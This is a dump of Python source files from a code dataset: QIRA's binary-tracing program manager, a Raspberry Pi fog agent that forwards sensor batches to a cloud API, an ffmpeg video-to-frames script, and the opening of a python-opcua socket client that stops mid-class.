source stringlengths 3 86 | python stringlengths 75 1.04M |
|---|---|
qira_program.py | from __future__ import print_function
from qira_base import *
import qira_config
import qira_analysis
import os
import shutil
import sys
import subprocess
import threading
import time
import collections
from hashlib import sha1
from subprocess import (Popen, PIPE)
import json
import struct
import qiradb
import arch
# new home of static2
sys.path.append(qira_config.BASEDIR+"/static2")
import static2
def which(prog):
  """Resolve *prog* to a real executable path, like strace/gdb do.

  First asks the system `which`; if that yields nothing (or fails to run),
  falls back to treating *prog* as a literal file path.

  Raises Exception("binary not found") when neither approach works.
  """
  try:
    cmd = ["which", prog]
    p = subprocess.Popen(cmd, stdout=subprocess.PIPE)
    res = p.stdout.readlines()
    p.wait()  # reap the child so it doesn't linger as a zombie
    if len(res) == 0:
      raise Exception("binary not found")
    path = res[0].strip()
    if not isinstance(path, str):
      # python3: pipe output is bytes; decode so callers get a str path
      path = path.decode()
    return os.path.realpath(path)
  except Exception:
    # fallback mode, look for the binary straight up
    if os.path.isfile(prog):
      return os.path.realpath(prog)
    else:
      raise Exception("binary not found")
# things that don't cross the fork
class Program:
def __init__(self, prog, args=[], qemu_args=[]):
  """Resolve *prog*, hash it, set up static analysis and the qemu arg list.

  NOTE(review): the mutable defaults args=[]/qemu_args=[] are shared across
  calls; they appear to be only read here, so harmless as written — confirm.
  """
  # create the logs dir
  try:
    os.mkdir(qira_config.TRACE_FILE_BASE)
  except:
    pass
  # call which to match the behavior of strace and gdb
  self.program = which(prog)
  self.args = args
  self.proghash = sha1(open(self.program, "rb").read()).hexdigest()
  print("*** program is",self.program,"with hash",self.proghash)
  # this is always initted, as it's the tag repo
  self.static = static2.Static(self.program)
  # init static
  if qira_config.WITH_STATIC:
    threading.Thread(target=self.static.process).start()
  # no traces yet
  self.traces = {}
  self.runnable = False
  # bring this back: keep /tmp/qira_binary pointing at the current target
  if self.program != "/tmp/qira_binary":
    try:
      os.unlink("/tmp/qira_binary")
    except:
      pass
    try:
      os.symlink(os.path.realpath(self.program), "/tmp/qira_binary")
    except:
      pass
  # defaultargs for qira binary
  self.defaultargs = ["-strace", "-D", "/dev/null", "-d", "in_asm", "-singlestep"]+qemu_args
  if qira_config.TRACE_LIBRARIES:
    self.defaultargs.append("-tracelibraries")
  self.identify_program()
def identify_program(self):
  """Detect the target's format/architecture and select tracer + registers.

  Sets self.fb (ELF e_machine, reused as arch id for PE/Mach-O),
  self.tregs, self.qirabinary / self.pintool where applicable, and
  self.runnable.  Raises on unsupported binary types.
  """
  qemu_dir = os.path.dirname(os.path.realpath(__file__))+"/../tracers/qemu/"
  pin_dir = os.path.dirname(os.path.realpath(__file__))+"/../tracers/pin/"
  lib_dir = os.path.dirname(os.path.realpath(__file__))+"/../libs/"
  self.pinbinary = pin_dir+"pin-latest/pin"
  # pmaps is global, but updated by the traces
  progdat = open(self.program, "rb").read(0x800)
  # Mach-O cputype/cpusubtype byte values
  CPU_TYPE_ARM = b"\x0C"
  CPU_TYPE_ARM64 = b"\x01\x00\x00\x0C"
  CPU_SUBTYPE_ARM_ALL = b"\x00"
  CPU_SUBTYPE_ARM_V4T = b"\x05"
  CPU_SUBTYPE_ARM_V6 = b"\x06"
  CPU_SUBTYPE_ARM_V5TEJ = b"\x07"
  CPU_SUBTYPE_ARM_XSCALE = b"\x08"
  CPU_SUBTYPE_ARM_V7 = b"\x09"
  CPU_SUBTYPE_ARM_V7F = b"\x0A"
  CPU_SUBTYPE_ARM_V7S = b"\x0B"
  CPU_SUBTYPE_ARM_V7K = b"\x0C"
  CPU_SUBTYPE_ARM_V6M = b"\x0E"
  CPU_SUBTYPE_ARM_V7M = b"\x0F"
  CPU_SUBTYPE_ARM_V7EM = b"\x10"
  CPU_SUBTYPE_ARM = [
    CPU_SUBTYPE_ARM_V4T,
    CPU_SUBTYPE_ARM_V6,
    CPU_SUBTYPE_ARM_V5TEJ,
    CPU_SUBTYPE_ARM_XSCALE,
    CPU_SUBTYPE_ARM_V7,
    CPU_SUBTYPE_ARM_V7F,
    CPU_SUBTYPE_ARM_V7K,
    CPU_SUBTYPE_ARM_V6M,
    CPU_SUBTYPE_ARM_V7M,
    CPU_SUBTYPE_ARM_V7EM
  ]
  CPU_SUBTYPE_ARM64 = [
    CPU_SUBTYPE_ARM_ALL,
    CPU_SUBTYPE_ARM_V7S
  ]
  MACHO_MAGIC = b"\xFE\xED\xFA\xCE"
  MACHO_CIGAM = b"\xCE\xFA\xED\xFE"
  MACHO_MAGIC_64 = b"\xFE\xED\xFA\xCF"
  MACHO_CIGAM_64 = b"\xCF\xFA\xED\xFE"
  MACHO_FAT_MAGIC = b"\xCA\xFE\xBA\xBE"
  MACHO_FAT_CIGAM = b"\xBE\xBA\xFE\xCA"
  MACHO_P200_FAT_MAGIC = b"\xCA\xFE\xD0\x0D"
  MACHO_P200_FAT_CIGAM = b"\x0D\xD0\xFE\xCA"
  # Linux binaries
  if progdat[0:4] == b"\x7FELF":
    # get file type
    self.fb = struct.unpack("H", progdat[0x12:0x14])[0] # e_machine
    def use_lib(arch):
      # point QEMU at a bundled sysroot for this arch, if one exists
      maybe_path = lib_dir+arch+"/"
      if 'QEMU_LD_PREFIX' not in os.environ and os.path.exists(maybe_path):
        os.environ['QEMU_LD_PREFIX'] = os.path.realpath(maybe_path)
        print("**** set QEMU_LD_PREFIX to",os.environ['QEMU_LD_PREFIX'])
    if self.fb == 0x28:
      # FIX: progdat is bytes, so the needles must be bytes too --
      # a str needle raises TypeError under python3
      if b'/lib/ld-linux.so.3' in progdat:
        use_lib('armel')
      elif b'/lib/ld-linux-armhf.so.3' in progdat:
        use_lib('armhf')
      self.tregs = arch.ARMREGS
      self.qirabinary = qemu_dir + "qira-arm"
    elif self.fb == 0xb7:
      use_lib('arm64')
      self.tregs = arch.AARCH64REGS
      self.qirabinary = qemu_dir + "qira-aarch64"
    elif self.fb == 0x3e:
      self.tregs = arch.X64REGS
      self.qirabinary = qemu_dir + "qira-x86_64"
      self.pintool = pin_dir + "obj-intel64/qirapin.so"
    elif self.fb == 0x03:
      use_lib('i386')
      self.tregs = arch.X86REGS
      self.qirabinary = qemu_dir + "qira-i386"
      self.pintool = pin_dir + "obj-ia32/qirapin.so"
    elif self.fb == 0x800:
      use_lib('mips')
      # NOTE(review): [2:-1] slice-assignment with a 2-tuple grows a 4-item
      # list; confirm MIPSREGS layout before touching this
      arch.MIPSREGS[2:-1] = (True, "mips")
      self.tregs = arch.MIPSREGS
      self.qirabinary = qemu_dir + 'qira-mips'
    elif self.fb == 0x08:
      use_lib('mipsel')
      arch.MIPSREGS[2:-1] = (False, "mipsel")
      self.tregs = arch.MIPSREGS
      self.qirabinary = qemu_dir + 'qira-mipsel'
    elif self.fb == 0x1400:   # big endian...
      use_lib('powerpc')
      self.tregs = arch.PPCREGS
      self.qirabinary = qemu_dir + "qira-ppc"
    else:
      raise Exception("binary type "+hex(self.fb)+" not supported")
    self.qirabinary = os.path.realpath(self.qirabinary)
    print("**** using",self.qirabinary,"for",hex(self.fb))
    self.runnable = True
  # Windows binaries: only the web server runs, no tracer (runnable stays False)
  elif progdat[0:2] == b"MZ":
    print("**** windows binary detected, only running the server")
    pe = struct.unpack("I", progdat[0x3c:0x40])[0]
    wh = struct.unpack("H", progdat[pe+4:pe+6])[0]
    if wh == 0x14c:
      print("*** 32-bit windows")
      self.tregs = arch.X86REGS
      self.fb = 0x03
    elif wh == 0x8664:
      print("*** 64-bit windows")
      self.tregs = arch.X64REGS
      self.fb = 0x3e
    else:
      raise Exception("windows binary with machine "+hex(wh)+" not supported")
  # MACHO FAT binaries
  elif progdat[0x0:0x04] in (MACHO_FAT_MAGIC, MACHO_FAT_CIGAM, MACHO_P200_FAT_MAGIC, MACHO_P200_FAT_CIGAM):
    print("**** Mach-O FAT (Universal) binary detected")
    if progdat[0x04:0x05] == CPU_TYPE_ARM and progdat[0x08:0x09] in CPU_SUBTYPE_ARM:
      print("**** Mach-O ARM architecture detected")
      self.macharch = "arm"
    elif (progdat[0x08:0x0c] == CPU_TYPE_ARM64) or (progdat[0x1c:0x20] == CPU_TYPE_ARM64) or (progdat[0x30:0x34] == CPU_TYPE_ARM64):
      print("**** Mach-O Aarch64 architecture detected")
      self.macharch = "aarch64"
    else:
      self.macharch = ""
      print("**** Mach-O X86/64 architecture detected")
    if progdat[0x0:0x04] in (MACHO_P200_FAT_MAGIC, MACHO_P200_FAT_CIGAM):
      raise NotImplementedError("Pack200 compressed files are not supported yet")
    elif progdat[0x0:0x04] in (MACHO_FAT_MAGIC, MACHO_FAT_CIGAM):
      if progdat[0x0:0x04] == MACHO_FAT_CIGAM:
        # byte-swapped magic: mark register sets big-endian
        arch.ARMREGS[2] = True
        arch.AARCH64REGS[2] = True
      if self.macharch == "arm":
        self.tregs = arch.ARMREGS
        self.pintool = ""
      elif self.macharch == "aarch64":
        self.tregs = arch.AARCH64REGS
        self.pintool = ""
      else:
        self.tregs = arch.X86REGS
        self.pintool = pin_dir + "obj-ia32/qirapin.dylib"
    else:
      raise Exception("Mach-O FAT (Universal) binary not supported")
    if self.macharch == "arm" or self.macharch == "aarch64":
      raise NotImplementedError("ARM/Aarch64 Support is not implemented")
    if not os.path.isfile(self.pintool):
      print("Running a Mach-O FAT (Universal) binary requires PIN support. See tracers/pin_build.sh")
      exit()
    # NOTE(review): unconditional raise -- the runnable line below is
    # unreachable; preserved as found
    raise NotImplementedError("Mach-O FAT (Universal) binary not supported")
    self.runnable = True
  # MACHO binaries
  elif progdat[0x0:0x04] in (MACHO_MAGIC_64, MACHO_CIGAM_64, MACHO_MAGIC, MACHO_CIGAM):
    print("**** Mach-O binary detected")
    if progdat[0x04:0x05] == CPU_TYPE_ARM and progdat[0x08:0x09] in CPU_SUBTYPE_ARM:
      print("**** Mach-O ARM architecture detected")
      self.macharch = "arm"
    elif progdat[0x04:0x05] == CPU_TYPE_ARM and progdat[0x08:0x09] in CPU_SUBTYPE_ARM64:
      print("**** Mach-O Aarch64 architecture detected")
      self.macharch = "aarch64"
    else:
      self.macharch = ""
      print("**** Mach-O X86/64 architecture detected")
    if progdat[0x0:0x04] in (MACHO_MAGIC_64, MACHO_CIGAM_64):
      if progdat[0x0:0x04] == MACHO_CIGAM_64:
        arch.AARCH64REGS[2] = True
      if self.macharch == "aarch64":
        self.tregs = arch.AARCH64REGS
        self.pintool = ""
      else:
        self.tregs = arch.X64REGS
        self.pintool = pin_dir + "obj-intel64/qirapin.dylib"
    elif progdat[0x0:0x04] in (MACHO_MAGIC, MACHO_CIGAM):
      if progdat[0x0:0x04] == MACHO_CIGAM:
        arch.ARMREGS[2] = True
      if self.macharch == "arm":
        self.tregs = arch.ARMREGS
        self.pintool = ""
      else:
        self.tregs = arch.X86REGS
        self.pintool = pin_dir + "obj-ia32/qirapin.dylib"
    else:
      raise Exception("Mach-O binary not supported")
    if self.macharch == "arm" or self.macharch == "aarch64":
      raise NotImplementedError("ARM/Aarch64 Support is not implemented")
    if not os.path.isfile(self.pintool):
      print("Running a Mach-O binary requires PIN support. See tracers/pin_build.sh")
      exit()
    self.runnable = True
  else:
    raise Exception("unknown binary type")
def clear(self):
  """Wipe previous trace runs and (re)create the shared qemu asm log."""
  # probably always good to do except in development of middleware
  print("*** deleting old runs")
  self.delete_old_runs()
  # getting asm from qemu
  self.create_asm_file()

def create_asm_file(self):
  """Truncate and re-open /tmp/qira_asm; qemu appends disassembly there."""
  if os.name == "nt":
    # no qemu-side asm log on Windows
    return
  try:
    os.unlink("/tmp/qira_asm")
  except:
    pass
  open("/tmp/qira_asm", "a").close()
  self.qira_asm_file = open("/tmp/qira_asm", "r")
def read_asm_file(self):
  """Consume newly appended lines from /tmp/qira_asm into the static DB.

  Each line looks like "<addr>: <bytes>  <mnemonic>" (qemu in_asm output);
  on ARM (self.fb == 0x28) the address is prefixed with a thumb flag
  character ('t'/'n').
  """
  if os.name == "nt":
    return
  dat = self.qira_asm_file.read()
  if len(dat) == 0:
    return
  cnt = 0
  for d in dat.split("\n"):
    thumb = False
    if len(d) == 0:
      continue
    # hacks
    try:
      if self.fb == 0x28:
        # thumb bit in front
        addr = int(d.split(" ")[0][1:].strip(":"), 16)
      else:
        addr = int(d.split(" ")[0].strip(":"), 16)
    except:
      continue
    if self.fb == 0x28:
      thumb_flag = d[0]
      if thumb_flag == 't':
        thumb = True
        # override the arch since it's thumb, clear invalid tag
        del self.static[addr]['instruction']
        self.static[addr]['arch'] = "thumb"
      elif thumb_flag == 'n':
        thumb = False
      else:
        #print "*** Invalid thumb flag at beginning of instruction"
        pass
      inst = d[d.rfind(" ")+2:]
    elif self.fb == 0xb7:   # aarch64
      inst = d[d.rfind(" ")+5:]
    else:
      inst = d[d.find(":")+3:]
    cnt += 1
    # trigger disasm (the tag lookup has the side effect of disassembling;
    # 'inst' itself is only used by the commented-out debug print below)
    d = self.static[addr]['instruction']
    #print addr, inst
    #sys.stdout.write("%d..." % cnt); sys.stdout.flush()
def delete_old_runs(self):
  """Remove and recreate the trace directory, discarding all logs."""
  # delete the logs
  shutil.rmtree(qira_config.TRACE_FILE_BASE)
  os.mkdir(qira_config.TRACE_FILE_BASE)

def get_maxclnum(self):
  """Return {forknum: [minclnum, maxclnum]} for every registered trace."""
  ret = {}
  for t in self.traces:
    ret[t] = [self.traces[t].db.get_minclnum(), self.traces[t].db.get_maxclnum()]
  return ret
def get_pmaps(self):
  """Merge the process maps of all traces into one {ghex(addr): kind} dict.

  A generic "memory" classification is overwritten by any more specific
  kind reported by a later trace; other kinds win first-come.
  """
  merged = {}
  for t in self.traces:
    pm = self.traces[t].db.get_pmaps()
    for addr in pm:
      if addr not in merged or merged[addr] == "memory":
        merged[addr] = pm[addr]
  # fix for numberless js
  return dict((ghex(addr), kind) for addr, kind in merged.items())
def add_trace(self, fn, i):
  """Register trace file *fn* under fork number *i*; return the new Trace."""
  # tregs[1]/len(tregs[0])/tregs[2] describe the register file for qiradb
  self.traces[i] = Trace(fn, i, self, self.tregs[1], len(self.tregs[0]), self.tregs[2])
  return self.traces[i]

def execqira(self, args=[], shouldfork=True):
  """Launch the target under the QEMU (or PIN) tracer.

  With shouldfork=True the parent returns immediately and the child
  exec()s the tracer; with shouldfork=False the current process is
  replaced (never returns on success).
  """
  if self.runnable == False:
    return
  if qira_config.USE_PIN:
    # is "-injection child" good?
    eargs = [self.pinbinary, "-injection", "child", "-t", self.pintool, "--", self.program]+self.args
  else:
    eargs = [self.qirabinary]+self.defaultargs+args+[self.program]+self.args
  if not os.path.exists(eargs[0]):
    print("\nQIRA tracer %s not found" % eargs[0])
    print("Your install is broken. Check ./install.sh for issues")
    exit(-1)
  if shouldfork:
    if os.fork() != 0:
      return
  #print "***",' '.join(eargs)
  os.execvp(eargs[0], eargs)
class Trace:
def __init__(self, fn, forknum, program, r1, r2, r3):
  """Open trace file *fn* for fork *forknum* and start its analysis thread.

  r1/r2/r3 come straight from Program.tregs (see Program.add_trace) and are
  passed to qiradb.PyTrace -- presumably register size, register count and
  endianness; confirm against the qiradb binding.
  """
  self.forknum = forknum
  self.program = program
  self.db = qiradb.PyTrace(fn, forknum, r1, r2, r3)
  self.load_base_memory()
  # analysis stuff -- all filled in lazily by analysis_thread
  self.maxclnum = None
  self.minclnum = None
  self.flow = None
  self.dmap = None
  self.maxd = 0
  self.analysisready = False
  self.picture = None
  self.needs_update = False
  self.strace = []
  self.mapped = []
  # clear this flag to make analysis_thread exit
  self.keep_analysis_thread = True
  threading.Thread(target=self.analysis_thread).start()
def fetch_raw_memory(self, clnum, address, ln):
  """Return *ln* bytes at *address* (change number *clnum*) as a str."""
  return ''.join(map(chr, self.fetch_memory(clnum, address, ln).values()))

# proxy the db call and fill in base memory
def fetch_memory(self, clnum, address, ln):
  """Return {offset: byte} for *ln* bytes at *address*.

  Bytes flagged 0x100 in the trace db are real traced values; anything
  else falls back to the static program image (missing bytes are simply
  omitted from the result).
  """
  mem = self.db.fetch_memory(clnum, address, ln)
  dat = {}
  for i in range(ln):
    # we don't rebase the memory anymore, important for numberless
    ri = address+i
    if mem[i] & 0x100:
      dat[i] = mem[i]&0xFF
    else:
      try:
        if (sys.version_info > (3, 0)):
          # py3: static.memory returns bytes, indexing yields an int
          dat[i] = self.program.static.memory(ri, 1)[0]
        else:
          dat[i] = ord(self.program.static.memory(ri, 1)[0])
      except IndexError:
        pass
  return dat
def read_strace_file(self):
  """Parse this fork's strace log into self.strace.

  Side effect: for every successful open/openat + mmap pair seen in the
  log, maps the file's contents into the static memory image at the
  mmap's returned address.
  """
  try:
    f = open(qira_config.TRACE_FILE_BASE+str(int(self.forknum))+"_strace").read()
  except:
    return "no strace"
  # drop non-ascii bytes so the split/parse below can't choke
  f = ''.join(filter(lambda x: ord(x) < 0x80, f))
  ret = []
  files = {}   # fd -> path, filled from open/openat return values
  for ff in f.split("\n"):
    if ff == '':
      continue
    ff = ff.split(" ")
    try:
      clnum = int(ff[0])
    except:
      continue
    # i think this filter isn't so useful now
    pid = int(ff[1])
    sc = " ".join(ff[2:])
    try:
      return_code = int(sc.split(") = ")[1].split(" ")[0], 0)
      fxn = sc.split("(")[0]
      if (fxn == "open" or fxn == "openat") and return_code != -1:
        firststr = sc.split('\"')[1]
        files[return_code] = firststr
      elif fxn[0:4] == "mmap":
        args = sc.split(",")
        sz = int(args[1], 0)
        fil = int(args[4], 0)
        off = int(args[5].split(")")[0], 0)
        mapp = (files[fil], sz, off, return_code)
        if mapp not in self.mapped:
          # if it fails once, don't try again
          self.mapped.append(mapp)
          try:
            try:
              # prefer the QEMU sysroot copy of the mapped file
              f = open(os.environ['QEMU_LD_PREFIX']+"/"+files[fil], 'rb')
            except:
              f = open(files[fil], 'rb')
            alldat = f.read()
            if fxn == "mmap2":
              off = 4096*off # offset argument is in terms of pages for mmap2()
              # is it safe to assume 4096 byte pages?
            st = "*** mapping %s %s sz:0x%x off:0x%x @ 0x%X" % (sha1(alldat).hexdigest(), files[fil], sz, off, return_code)
            print(st,)
            dat = alldat[off:off+sz]
            self.program.static.add_memory_chunk(return_code, dat)
          except Exception as e:
            print(e)
    except:
      # unparseable syscall line: still record it below, just don't map
      pass
    ret.append({"clnum": clnum, "pid":pid, "sc": sc})
  self.strace = ret
def analysis_thread(self):
  """Background loop: rerun flow/depth/picture analysis when the db grows.

  Polls every 200ms; exits when self.keep_analysis_thread is cleared.
  """
  print("*** started analysis_thread", self.forknum)
  while self.keep_analysis_thread:
    time.sleep(0.2)
    # so this is done poorly, analysis can be incremental
    if self.maxclnum == None or self.db.get_maxclnum() != self.maxclnum:
      self.analysisready = False
      minclnum = self.db.get_minclnum()
      maxclnum = self.db.get_maxclnum()
      self.program.read_asm_file()
      self.flow = qira_analysis.get_instruction_flow(self, self.program, minclnum, maxclnum)
      self.dmap = qira_analysis.get_hacked_depth_map(self.flow, self.program)
      qira_analysis.analyse_calls(self)
      # hacky pin offset problem fix
      hpo = len(self.dmap)-(maxclnum-minclnum)
      if hpo == 2:
        self.dmap = self.dmap[1:]
      self.maxd = max(self.dmap)
      self.picture = qira_analysis.get_vtimeline_picture(self, minclnum, maxclnum)
      self.minclnum = minclnum
      self.maxclnum = maxclnum
      # tell the web frontend there is fresh analysis to push
      self.needs_update = True
      #print "analysis is ready"
  print("*** ended analysis_thread", self.forknum)
def load_base_memory(self):
  """Populate the static memory image from this fork's _base map file.

  Follows the fork chain back to the originating trace's base file, then
  loads each mapped region either from a bundled _images/ snapshot or
  from the file on disk.
  """
  def get_forkbase_from_log(n):
    # the parent fork number is stored at offset 0x10 of the trace log;
    # -1 means this is the root trace
    ret = struct.unpack("i", open(qira_config.TRACE_FILE_BASE+str(n), 'rb').read(0x18)[0x10:0x14])[0]
    if ret == -1:
      return n
    else:
      return get_forkbase_from_log(ret)
  try:
    forkbase = get_forkbase_from_log(self.forknum)
    print("*** using base %d for %d" % (forkbase, self.forknum))
    f = open(qira_config.TRACE_FILE_BASE+str(forkbase)+"_base", 'r')
  except Exception as e:
    print("*** base file issue",e)
    # done
    return
  # Use any bundled images first. The structure of the images directory is:
  #   _images/
  #     urlencoded%20image.dll
  #     or%20maybe%20a%20folder.dll/
  #       0000C000
  #       100008000
  # where a folder is like a sparsefile with chunks of data at it's
  # hex-offset-named subfiles. The reason for this sparsefile stuff is that
  # OS X has non-contigous loaded images, so we compensate by having each
  # "file" actually be a chunk of address space, which in theory could be
  # very large. (The correct solution of storing just the image file along
  # with the regions data isn't well exposed by Pin at this time, and would
  # require explicit mach-o parsing and stuff.)
  img_map = {}
  images_dir = qira_config.TRACE_FILE_BASE+str(self.forknum)+"_images"
  if os.path.isdir(images_dir):
    try:
      from urllib import unquote   # NOTE(review): py2 location; py3 is urllib.parse
      for image in os.listdir(images_dir):
        if os.path.isfile(images_dir+"/"+image):
          img_map[unquote(image)] = {0: images_dir+"/"+image}
        else:   # It's a directory
          off_map = {}
          for offset in os.listdir(images_dir+"/"+image):
            off_map[int(offset, 16)] = images_dir+"/"+image+"/"+offset
          img_map[unquote(image)] = off_map
    except Exception as e:
      print("Exception while dealing with _images/:", e)
  for ln in f.read().split("\n"):
    ln = ln.split(" ")
    if len(ln) < 3:
      continue
    (ss, se) = ln[0].split("-")
    ss = int(ss, 16)
    se = int(se, 16)
    offset = int(ln[1], 16)
    fn = ' '.join(ln[2:])
    try:
      if fn in img_map:
        # FIX: dict has no iter_keys() (py2 spells it iterkeys());
        # iterating the dict directly works on both 2 and 3
        off = max(i for i in img_map[fn] if i <= offset)
        # use a distinct name so we don't shadow the base-map handle 'f'
        with open(img_map[fn][off], 'rb') as imgf:
          imgf.seek(offset-off)
          dat = imgf.read(se-ss)
      else:
        with open(fn, 'rb') as imgf:
          imgf.seek(offset)
          dat = imgf.read(se-ss)
    except Exception as e:
      print("Failed to get", fn, "offset", offset, ":", e)
      continue
    self.program.static.add_memory_chunk(ss, dat)
|
fog_agent_new_tests.py | #Author: Roberto Goncalves Pacheco
#Universidade do Estado do Rio de Janeiro
#Departamento de Eletronica e Telecomunicacoes
#Project: Sensing Bus
#Subject: Comunication between Cloud and Fog
from BaseHTTPServer import BaseHTTPRequestHandler, HTTPServer
import SocketServer
from signal import signal, SIGPIPE, SIG_DFL
from urlparse import parse_qs
import json
import requests
import time
import datetime
import threading, Queue
import sys
import Module
signal(SIGPIPE, SIG_DFL)
SERVER_CERTS = '/home/pi/ssl/ca-chain.cert.pem' #To verify server
STOP_ID = 1 #This raspberrie's id
MEASUREMENTS_URL = 'https://sensingbus.gta.ufrj.br/measurements_batch_sec/' #Endpoint of insertion api
# Variables for server-side validation:
PRIMARY_KEY='/home/pi/ssl/raspberry.key.pem'
LOCAL_CERTIFICATE='/home/pi/ssl/raspberry.cert.pem'
q = Queue.Queue()
def send_thread(thread_name,q):
    """Sends periodically stored data.

    Every 30s, drains queue *q* into one batch payload and POSTs it to the
    cloud (only when the queue had data). Runs forever; used as a daemon
    thread by run().
    """
    while True:
        output = {}
        output['stop_id'] = STOP_ID
        output['batches'] = []
        if not q.empty():
            while not q.empty():
                b = q.get()
                if ( b is not None):
                    output['batches'].append(b)
            cloud_client(output)
        time.sleep(30)
def cloud_client(payload):
    """Send *payload* to the cloud over mutually-authenticated TLS.

    Uses the CA chain in SERVER_CERTS to verify the server and the local
    cert/key pair for client authentication.
    """
    r = requests.post(MEASUREMENTS_URL,
                      json=payload,
                      verify=SERVER_CERTS,
                      cert=(LOCAL_CERTIFICATE, PRIMARY_KEY))
    print r
class S(BaseHTTPRequestHandler):
    """HTTP handler that receives sensor batches POSTed by the nodes."""
    def _set_headers(self):
        """Creates header HTTP requisition"""
        self.send_response(200)
        self.send_header('Content-Type', 'application/json')
        self.end_headers()
    def do_POST(self):
        """Receives data from Arduino and sends to Cloud"""
        input_batches = {}
        # body is a urlencoded form; keep_blank_values so empty fields survive
        postvars = parse_qs(self.rfile.read(int(self.headers['Content-Length'])),
                            keep_blank_values=1)
        print postvars
        input_batches['node_id'] = postvars['node_id'][0]
        for line in postvars['load']:
            tmp = line.split('\n')
            module = Module.module(tmp)
            module.controller()
            # NOTE(review): cloud forwarding + queueing disabled below --
            # Module.controller() is currently the only consumer of the data
            #cloud_client(module.get_payload())
            #input_batches['type'] = str(postvars['type'][0])
            #input_batches['header'] = str(postvars['header'][0])
            #input_batches['received'] = str(datetime.datetime.now())
            #input_batches['load'] = tmp[0:-1] #the last line is always empty
            #q.put(input_batches)
        return
def run(server_class=HTTPServer, handler_class=S, port=50000):
    """Generates a server to receive POST method.

    Starts the periodic uploader as a daemon thread, then serves forever.
    """
    server_address = ('', port)
    httpd = server_class(server_address, handler_class)
    print 'Starting Server Http'
    t = threading.Thread( target = send_thread, args=('alt',q))
    t.daemon = True
    t.start()
    httpd.serve_forever()
    # serve_forever() blocks, so this join only runs after a shutdown
    t.join()

if __name__ == "__main__":
    run()
|
vid2img_other.py | # Code for "TSM: Temporal Shift Module for Efficient Video Understanding"
# arXiv:1811.08383
# Ji Lin*, Chuang Gan, Song Han
# {jilin, songhan}@mit.edu, ganchuang@csail.mit.edu
import os
import threading
import pdb
NUM_THREADS = 12
# VIDEO_ROOT = '/ssd/video/something/v2/20bn-something-something-v2' # Downloaded webm videos
# FRAME_ROOT = '/ssd/video/something/v2/20bn-something-something-v2-frames' # Directory for extracted frames
# VIDEO_ROOT = '/data/datasets/smt-smt-V2/20bn-something-something-v2'
# FRAME_ROOT = '/data/datasets/smt-smt-V2/20bn-something-something-v2-frames'
num_sec = 5
VIDEO_ROOT = '/data/datasets/in_the_wild/gifs'
FRAME_ROOT = f'/data/datasets/in_the_wild/gifs-frames-{num_sec}s'
# VIDEO_ROOT = '/data/datasets/in_the_wild/dataset_imar'
# FRAME_ROOT = f'/data/datasets/in_the_wild/dataset_imar-frames-{num_sec}s'
def split(l, n):
    """Yield successive n-sized chunks from l."""
    start = 0
    while start < len(l):
        yield l[start:start + n]
        start += n
def extract(video, tmpl='%06d.jpg'):
    """Extract the first num_sec seconds of *video* into per-frame JPEGs,
    scaled to height 256, under FRAME_ROOT/<video-name-minus-extension>/."""
    # os.system(f'ffmpeg -i {VIDEO_ROOT}/{video} -vf -threads 1 -vf scale=-1:256 -q:v 0 '
    #           f'{FRAME_ROOT}/{video[:-5]}/{tmpl}')
    # cmd0 = 'ffmpeg -i \"{}/{}\" -threads 1 -vf scale=-1:256 -q:v 0 \"{}/{}/%06d.jpg\"'.format(VIDEO_ROOT, video,
    #                                                                                           FRAME_ROOT, video[:-5])
    cmd = f'ffmpeg -t 00:0{num_sec} '
    cmd = cmd + '-i \"{}/{}\" -threads 1 -vf scale=-1:256 -q:v 0 \"{}/{}/%06d.jpg\"'.format(VIDEO_ROOT, video,
                                                                                            FRAME_ROOT, video[:-5])
    # NOTE(review): shell command built from filenames; quoting covers spaces
    # but not other shell metacharacters -- dataset filenames assumed trusted
    os.system(cmd)

def target(video_list):
    """Worker: extract frames for each video, re-extracting folders that
    ended up with suspiciously few (<= 10) frames."""
    for video in video_list:
        video_path = os.path.join(FRAME_ROOT, video[:-5])
        if not os.path.exists(video_path):
            #print(f'video {video_path} does not exists')
            os.makedirs(os.path.join(FRAME_ROOT, video[:-5]))
            extract(video)
        else:
            dir_files = os.listdir(os.path.join(FRAME_ROOT, video[:-5]))
            if len(dir_files) <= 10:
                print(f'folder {video} has only {len(dir_files)} frames')
                extract(video)
if __name__ == '__main__':
    if not os.path.exists(VIDEO_ROOT):
        raise ValueError('Please download videos and set VIDEO_ROOT variable.')
    if not os.path.exists(FRAME_ROOT):
        os.makedirs(FRAME_ROOT)
    video_list = os.listdir(VIDEO_ROOT)
    splits = list(split(video_list, NUM_THREADS))
    threads = []
    # 'chunk' instead of 'split' so the split() helper isn't shadowed
    for i, chunk in enumerate(splits):
        #target(chunk)
        thread = threading.Thread(target=target, args=(chunk,))
        thread.start()
        threads.append(thread)
    for thread in threads:
        thread.join()
ua_client.py | """
Low level binary client
"""
import logging
import socket
from threading import Thread, Lock
from concurrent.futures import Future
from functools import partial
from opcua import ua
from opcua.ua.ua_binary import struct_from_binary, uatcp_to_binary, struct_to_binary, nodeid_from_binary
from opcua.ua.uaerrors import UaError, BadTimeout, BadNoSubscription, BadSessionClosed
from opcua.common.connection import SecureConnection
class UASocketClient(object):
"""
handle socket connection and send ua messages
timeout is the timeout used while waiting for an ua answer from server
"""
def __init__(self, timeout=1, security_policy=ua.SecurityPolicy()):
    """Set up state for one UA TCP connection; call connect_socket() to open it.

    NOTE(review): the default security_policy is a mutable default, created
    once at import time and shared by every no-arg instance -- confirm
    SecurityPolicy is stateless before relying on that.
    """
    self.logger = logging.getLogger(__name__ + ".Socket")
    self._thread = None
    self._lock = Lock()
    self.timeout = timeout
    self._socket = None
    self._do_stop = False
    self.authentication_token = ua.NodeId()
    self._request_id = 0
    self._request_handle = 0
    # request_id -> Future, resolved by the receiver thread
    self._callbackmap = {}
    self._connection = SecureConnection(security_policy)

def start(self):
    """
    Start receiving thread.
    this is called automatically in connect and
    should not be necessary to call directly
    """
    self._thread = Thread(target=self._run)
    self._thread.start()
def _send_request(self, request, callback=None, timeout=1000, message_type=ua.MessageType.SecureMessage):
    """
    send request to server, lower-level method
    timeout is the timeout written in ua header
    returns future
    """
    with self._lock:
        request.RequestHeader = self._create_request_header(timeout)
        self.logger.debug("Sending: %s", request)
        try:
            binreq = struct_to_binary(request)
        except Exception:
            # reset request handle if any error
            # see self._create_request_header
            self._request_handle -= 1
            raise
        self._request_id += 1
        future = Future()
        if callback:
            future.add_done_callback(callback)
        # register before writing so the receiver can't beat us to it
        self._callbackmap[self._request_id] = future
        msg = self._connection.message_to_binary(binreq, message_type=message_type, request_id=self._request_id)
        self._socket.write(msg)
    return future

